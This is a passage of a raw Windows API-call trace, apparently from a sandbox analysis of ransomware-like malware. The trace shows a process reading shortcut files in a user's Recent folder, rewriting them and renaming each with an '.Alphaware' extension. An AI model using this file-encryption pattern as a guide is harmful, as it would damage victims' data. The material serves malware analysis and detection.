(lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCNVmrhf2U7XXJBaxRmB.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vcnvmrhf2u7xxjbaxrmb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.933] ReadFile (in: hFile=0x250, lpBuffer=0x2577e10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2577e10*, lpNumberOfBytesRead=0x23e958*=0x3ed, lpOverlapped=0x0) returned 1 [0098.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.962] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCNVmrhf2U7XXJBaxRmB.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vcnvmrhf2u7xxjbaxrmb.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.965] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCNVmrhf2U7XXJBaxRmB.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vcnvmrhf2u7xxjbaxrmb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcef5db80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcef5db80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d2ef2e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608)) returned 1 [0098.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.965] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCNVmrhf2U7XXJBaxRmB.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vcnvmrhf2u7xxjbaxrmb.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCNVmrhf2U7XXJBaxRmB.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vcnvmrhf2u7xxjbaxrmb.lnk.alphaware")) returned 1 [0098.966] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vmOQizT54.lnk", dwFileAttributes=0x80) returned 1 [0098.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.967] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vmOQizT54.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vmoqizt54.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23f95f8 | out: lpFileInformation=0x23f95f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf9edd20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb6aae0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb6aae0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1765)) returned 1 [0098.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.967] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vmOQizT54.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vmoqizt54.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.967] ReadFile (in: hFile=0x250, lpBuffer=0x23f98b0, nNumberOfBytesToRead=0x1765, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f98b0*, lpNumberOfBytesRead=0x23e958*=0x1765, lpOverlapped=0x0) returned 1 [0098.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.992] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vmOQizT54.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vmoqizt54.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.995] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vmOQizT54.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vmoqizt54.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf9edd20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb6aae0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d33b5a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2008)) returned 1 [0098.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.995] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vmOQizT54.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vmoqizt54.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vmOQizT54.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vmoqizt54.lnk.alphaware")) returned 1 [0098.997] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vo9MO3eEU2 SLpQJWfM.lnk", dwFileAttributes=0x80) returned 1 [0098.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vo9MO3eEU2 SLpQJWfM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vo9mo3eeu2 slpqjwfm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2488660 | out: lpFileInformation=0x2488660*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd13d0c60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13d0c60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13d0c60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xf4e)) returned 1 [0098.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.997] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vo9MO3eEU2 SLpQJWfM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vo9mo3eeu2 slpqjwfm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.997] ReadFile (in: hFile=0x250, lpBuffer=0x24898c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24898c0*, lpNumberOfBytesRead=0x23e958*=0xf4e, lpOverlapped=0x0) returned 1 [0099.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.021] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vo9MO3eEU2 SLpQJWfM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vo9mo3eeu2 slpqjwfm.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vo9MO3eEU2 SLpQJWfM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vo9mo3eeu2 slpqjwfm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13d0c60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13d0c60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d387860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1534)) returned 1 [0099.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.024] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vo9MO3eEU2 SLpQJWfM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vo9mo3eeu2 slpqjwfm.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vo9MO3eEU2 SLpQJWfM.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vo9mo3eeu2 slpqjwfm.lnk.alphaware")) returned 1 [0099.025] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vwNeKxlo1w35_GTiy.lnk", dwFileAttributes=0x80) returned 1 [0099.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.026] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vwNeKxlo1w35_GTiy.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vwnekxlo1w35_gtiy.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2512490 | out: lpFileInformation=0x2512490*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfb6aae0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb6aae0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb6aae0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1e16)) returned 1 [0099.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.026] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vwNeKxlo1w35_GTiy.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vwnekxlo1w35_gtiy.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.026] ReadFile (in: hFile=0x250, lpBuffer=0x2512788, nNumberOfBytesToRead=0x1e16, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2512788*, lpNumberOfBytesRead=0x23e958*=0x1e16, lpOverlapped=0x0) returned 1 [0099.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.050] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vwNeKxlo1w35_GTiy.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vwnekxlo1w35_gtiy.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.053] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vwNeKxlo1w35_GTiy.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vwnekxlo1w35_gtiy.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb6aae0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb6aae0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d3d3b20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x28f4)) returned 1 [0099.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.054] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vwNeKxlo1w35_GTiy.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vwnekxlo1w35_gtiy.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vwNeKxlo1w35_GTiy.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vwnekxlo1w35_gtiy.lnk.alphaware")) returned 1 [0099.055] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vxbet57tOqM.lnk", dwFileAttributes=0x80) returned 1 [0099.055] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.055] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vxbet57tOqM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vxbet57toqm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25a5a98 | out: lpFileInformation=0x25a5a98*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd15278c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15278c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15278c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x227)) returned 1 [0099.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.056] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.056] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vxbet57tOqM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vxbet57toqm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.056] ReadFile (in: hFile=0x250, lpBuffer=0x25a5f78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25a5f78*, lpNumberOfBytesRead=0x23e958*=0x227, lpOverlapped=0x0) returned 1 [0099.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.081] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vxbet57tOqM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vxbet57toqm.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.084] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vxbet57tOqM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vxbet57toqm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15278c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15278c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d41fde0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3b4)) returned 1 [0099.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.084] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vxbet57tOqM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vxbet57toqm.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vxbet57tOqM.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vxbet57toqm.lnk.alphaware")) returned 1 [0099.085] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w0y6K3cxjraf-y2uE6.lnk", dwFileAttributes=0x80) returned 1 [0099.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.086] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w0y6K3cxjraf-y2uE6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w0y6k3cxjraf-y2ue6.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2426108 | out: lpFileInformation=0x2426108*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d6b140, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0d6b140, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x98d)) returned 1 [0099.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.086] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w0y6K3cxjraf-y2uE6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w0y6k3cxjraf-y2ue6.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.086] ReadFile (in: hFile=0x250, lpBuffer=0x2426da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2426da8*, lpNumberOfBytesRead=0x23e958*=0x98d, lpOverlapped=0x0) returned 1 [0099.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.109] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w0y6K3cxjraf-y2uE6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w0y6k3cxjraf-y2ue6.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.112] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w0y6K3cxjraf-y2uE6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w0y6k3cxjraf-y2ue6.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d6b140, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d46c0a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd88)) returned 1 [0099.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.112] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w0y6K3cxjraf-y2uE6.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w0y6k3cxjraf-y2ue6.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w0y6K3cxjraf-y2uE6.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w0y6k3cxjraf-y2ue6.lnk.alphaware")) returned 1 [0099.113] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w1qxUxlTv5acD7ekU7.mkv.lnk", dwFileAttributes=0x80) returned 1 [0099.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w1qxUxlTv5acD7ekU7.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w1qxuxltv5acd7eku7.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24ac4c0 | out: lpFileInformation=0x24ac4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd002d6e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd002d6e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0053840, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3e3)) returned 1 [0099.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.114] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w1qxUxlTv5acD7ekU7.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w1qxuxltv5acd7eku7.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.114] ReadFile (in: hFile=0x250, lpBuffer=0x24acbd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24acbd8*, lpNumberOfBytesRead=0x23e958*=0x3e3, lpOverlapped=0x0) returned 1 [0099.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.136] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w1qxUxlTv5acD7ekU7.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w1qxuxltv5acd7eku7.mkv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.139] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w1qxUxlTv5acD7ekU7.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w1qxuxltv5acd7eku7.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd002d6e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd002d6e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d492200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608)) returned 1 [0099.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.139] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w1qxUxlTv5acD7ekU7.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w1qxuxltv5acd7eku7.mkv.lnk"), 